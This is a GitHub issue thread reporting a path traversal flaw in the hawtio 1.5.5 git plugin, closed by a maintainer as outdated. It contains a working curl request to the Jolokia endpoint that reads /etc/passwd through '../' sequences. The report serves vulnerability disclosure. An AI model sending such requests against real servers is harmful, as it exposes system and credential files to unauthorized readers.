### ISSUE TITLE
Security Issue in hawtio git plugin

### ISSUE THREAD

**Issue by abendt** [hawtio/hawtio#2402]
we setup hawtio (v1.5.5)  in jetty to manage one of our production machines.
It seems that the git plugin has a security issue. Using the following curl statement it's possible
to read system files from remote:

```
curl  -v -X POST "http://hostname:8080/hawtio/jolokia/?maxDepth=7&maxCollectionSize=50000&ignoreErrors=true&canonicalNaming=false" -d '{"type":"exec","mbean":"hawtio:type=GitFacade","operation":"read","arguments":[null,"..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd"]}'
```

we tried to disable the git plugin by setting -Dhawtio.offline=true but this does not seem to have an effect on the issue.

https://cwe.mitre.org/data/definitions/73.html

**Comment by tadayosi** [comment]
Let's close it as outdated.
